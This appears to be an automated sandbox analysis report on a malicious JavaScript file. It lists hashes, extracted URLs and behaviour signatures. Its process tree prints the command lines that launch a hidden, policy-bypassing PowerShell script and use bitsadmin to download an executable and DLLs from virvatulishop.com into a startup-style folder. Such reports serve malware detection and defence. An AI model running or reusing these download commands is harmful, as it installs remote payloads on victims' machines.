Analysis
-
max time kernel
75s -
max time network
79s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
09/07/2023, 19:19
Static task
static1
Behavioral task
behavioral1
Sample
ave6119jsjsjsjsjsjsjsjsjs.js
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
ave6119jsjsjsjsjsjsjsjsjs.js
Resource
win10v2004-20230703-en
General
-
Target
ave6119jsjsjsjsjsjsjsjsjs.js
-
Size
48KB
-
MD5
55843871939bed9cad5acd5fba556736
-
SHA1
178c0a04d0ff6c2bb2baa1e5e241f3028198b935
-
SHA256
c4a3d1cec5bac2e0f1eb4671633ee0650b07831004130bd1d76c503655d2d26f
-
SHA512
a172c45060209c9ee5afd1348ed346a3c1de41f4b75b7ae4f58c9f0ae0f1782dbc0d5bf4e45c977b74bdecdf11f569203861ccba4526bb2a21c18734c673a6e3
-
SSDEEP
1536:nb1OUBLsGy18tV+FKnU7rkGsBWOnK5/YP2ay++o:nb1lwaH+FKZGsBNnK5/YPeVo
Malware Config
Extracted
https://virvatulishop.com/labda.zip
https://virvatulishop.com/files/
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 6 IoCs
pid Process 2380 bitsadmin.exe 2032 bitsadmin.exe 1760 bitsadmin.exe 2512 bitsadmin.exe 2216 bitsadmin.exe 1752 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2336 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2336 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 784 wrote to memory of 2336 784 wscript.exe 28 PID 784 wrote to memory of 2336 784 wscript.exe 28 PID 784 wrote to memory of 2336 784 wscript.exe 28 PID 2336 wrote to memory of 2380 2336 powershell.exe 30 PID 2336 wrote to memory of 2380 2336 powershell.exe 30 PID 2336 wrote to memory of 2380 2336 powershell.exe 30 PID 2336 wrote to memory of 2032 2336 powershell.exe 31 PID 2336 wrote to memory of 2032 2336 powershell.exe 31 PID 2336 wrote to memory of 2032 2336 powershell.exe 31 PID 2336 wrote to memory of 1760 2336 powershell.exe 32 PID 2336 wrote to memory of 1760 2336 powershell.exe 32 PID 2336 wrote to memory of 1760 2336 powershell.exe 32 PID 2336 wrote to memory of 2512 2336 powershell.exe 33 PID 2336 wrote to memory of 2512 2336 powershell.exe 33 PID 2336 wrote to memory of 2512 2336 powershell.exe 33 PID 2336 wrote to memory of 2216 2336 powershell.exe 34 PID 2336 wrote to memory of 2216 2336 powershell.exe 34 PID 2336 wrote to memory of 2216 2336 powershell.exe 34 PID 2336 wrote to memory of 1752 2336 powershell.exe 35 PID 2336 wrote to memory of 1752 2336 powershell.exe 35 PID 2336 wrote to memory of 1752 2336 powershell.exe 35
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js1⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll3⤵
- Download via BitsAdmin
PID:2380
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe3⤵
- Download via BitsAdmin
PID:2032
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini3⤵
- Download via BitsAdmin
PID:1760
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL3⤵
- Download via BitsAdmin
PID:2512
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll3⤵
- Download via BitsAdmin
PID:2216
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf3⤵
- Download via BitsAdmin
PID:1752
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57269a83e127ff320b1f8810b6623ee98
SHA152d53be0e3bf58d1a330f24f7a4f1f6ee543b4a2
SHA2569bb8941997354717115d7d57f559b16a5d4be037843cd2403ce16e61add7d404
SHA5123bb453737c33a01ea10d365b93685a0d53d7a396d0d1a46466a08388acc49e662fd25300e36695466690cbf9198df9bb50dc1dd0ac6bf92aa7e37ca5152e9877